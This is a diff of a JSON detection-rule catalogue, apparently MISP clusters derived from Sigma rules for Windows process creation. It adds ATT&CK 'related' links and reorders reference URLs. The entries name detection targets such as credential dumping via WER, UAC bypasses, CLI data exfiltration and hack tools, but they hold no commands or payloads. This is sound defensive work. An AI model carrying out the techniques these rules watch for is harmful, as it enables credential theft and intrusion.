"type": "related-to" + } + ], "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", "value": "Suspicious Rundll32 Setupapi.dll Activity" }, @@ -46583,8 +59915,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ @@ -46592,6 +59924,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "value": "Net.exe User Account Creation" }, @@ -46608,8 +59949,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1474899714290208777?s=12", "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" ], "tags": "No established tags" @@ -46641,6 +59982,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "value": "Suspicious RDP Redirect Using TSCON" }, @@ -46665,6 +60015,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", "value": "Use of NetSupport Remote Access Software" }, @@ -46690,6 +60049,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", "value": "Hurricane Panda Activity" }, @@ -46717,6 +60085,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "value": "Suspicious Encoded Obfuscated LOAD String" }, @@ -46733,8 +60110,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" ], "tags": [ @@ -46742,6 +60119,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "value": "Potential Credential Dumping Via WER" }, @@ -46768,6 +60154,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", "value": "Renamed FTP.EXE Binary Execution" }, @@ -46784,8 +60186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/chromeloader/", "https://emkc.org/s/RJjuLa", + "https://redcanary.com/blog/chromeloader/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" ], "tags": [ @@ -46793,6 +60195,15 @@ "attack.t1176" ] }, + "related": [ + { + "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", "value": "Powershell ChromeLoader Browser Hijacker" }, @@ -46818,6 +60229,15 @@ "attack.t1496" ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "value": "Windows Crypto Mining Indicators" }, @@ -46842,6 +60262,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", "value": "JSC Convert Javascript To Executable" }, @@ -46869,6 +60298,15 @@ "car.2019-04-003" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "value": "Regsvr32 Anomaly" }, @@ -46885,9 +60323,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" ], "tags": [ @@ -46895,6 +60333,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "value": "Disable Important Scheduled Task" }, @@ -46920,6 +60367,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", "value": "Execute MSDT Via Answer File" }, @@ -46944,6 +60400,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36210e0d-5b19-485d-a087-c096088885f0", "value": "Suspicious PowerShell Parameter Substring" }, @@ -46960,8 +60425,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" ], "tags": [ @@ -46971,6 +60436,22 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", "value": "Execute Code with Pester.bat as Parent" }, @@ -46996,6 +60477,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", "value": "Suspicious ScreenSave Change by Reg.exe" }, @@ -47045,6 +60535,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", "value": "AnyDesk Inline Piped Password" }, @@ -47061,9 +60560,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" ], "tags": [ @@ -47071,6 +60570,15 @@ "attack.t1055.001" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6345b048-8441-43a7-9bed-541133633d7a", "value": "ZOHO Dctask64 Process Injection" }, @@ -47095,6 +60603,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "value": "Possible Exfiltration Of Data Via CLI" }, @@ -47145,6 +60662,22 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "value": "Application Whitelisting Bypass via Dnx.exe" }, @@ -47162,9 +60695,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], "tags": [ @@ -47172,6 +60705,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "value": "Use of VisualUiaVerifyNative.exe" }, @@ -47196,6 +60738,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", "value": "Suspicious Cmd Execution via WMI" }, @@ -47220,6 +60771,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "value": "ADCSPwn Hack Tool" }, @@ -47236,8 +60796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ @@ -47269,6 +60829,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", "value": "VMToolsd Suspicious Child Process" }, @@ -47295,6 +60864,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" }, @@ -47313,8 +60898,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" ], "tags": [ @@ -47322,6 +60907,15 @@ "attack.t1222.001" ] }, + "related": [ + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", "value": "File or Folder Permissions Modifications" }, @@ -47348,6 +60942,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "178e615d-e666-498b-9630-9ed363038101", "value": "Suspicious Elevated System Shell" }, @@ -47401,6 +61004,22 @@ "attack.t1218.003" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", "value": "Bypass UAC via CMSTP" }, @@ -47418,9 +61037,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" ], "tags": [ @@ -47454,6 +61073,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", "value": "PsExec Tool Execution" }, @@ -47500,6 +61128,15 @@ "cve.2021.26857" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "value": "CVE-2021-26857 Exchange Exploitation" }, @@ -47524,6 +61161,15 @@ "attack.t1027.005" ] }, + "related": [ + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "value": "DefenderCheck Usage" }, @@ -47540,8 +61186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" ], "tags": [ @@ -47599,6 +61245,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", "value": "Quick Execution of a Series of Suspicious Commands" }, @@ -47616,8 +61271,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -47652,6 +61307,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", "value": "UAC Bypass WSReset" }, @@ -47725,6 +61389,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", "value": "DeviceCredentialDeployment Execution" }, @@ -47741,8 +61414,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" ], "tags": [ @@ -47753,6 +61426,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", "value": "Office Applications Spawning Wmi Cli Alternate" }, @@ -47777,6 +61473,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", "value": "Service Execution" }, @@ -47802,6 +61507,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "value": "Procdump Usage" }, @@ -47827,6 +61541,15 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", "value": "Mshta JavaScript Execution" }, @@ -47852,6 +61575,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "value": "Ruby Inline Command Execution" }, @@ -47876,6 +61608,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "value": "Suspicious Reg Add Open Command" }, @@ -47902,6 +61643,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", "value": "Renamed PsExec" }, @@ -47926,6 +61676,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", "value": "WSF/JSE/JS/VBA/VBE File Execution" }, @@ -47954,6 +61720,36 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "value": "Suspicious Parent of Csc.exe" }, @@ -47980,6 +61776,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" }, @@ -47996,8 +61801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" ], "tags": [ @@ -48046,8 +61851,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" ], "tags": [ @@ -48055,6 +61860,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", "value": "EvilNum Golden Chickens Deployment via OCX Files" }, @@ -48079,6 +61893,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "value": "Delete Important Scheduled Task" }, @@ -48095,8 +61918,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" ], "tags": [ @@ -48106,6 +61929,22 @@ "attack.t1027.005" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "value": "CrackMapExec PowerShell Obfuscation" }, @@ -48132,6 +61971,15 @@ "attack.t1027.003" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "value": "Findstr Launching .lnk File" }, @@ -48180,6 +62028,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "value": "Wbadmin Delete Systemstatebackup" }, @@ -48204,6 +62061,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "value": "Zip A Folder With PowerShell For Staging In Temp" }, @@ -48214,7 +62080,8 @@ "creation_date": "2019/09/26", "falsepositive": [ "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "filename": "proc_creation_win_susp_eventlog_clear.yml", "level": "high", @@ -48222,8 +62089,10 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - 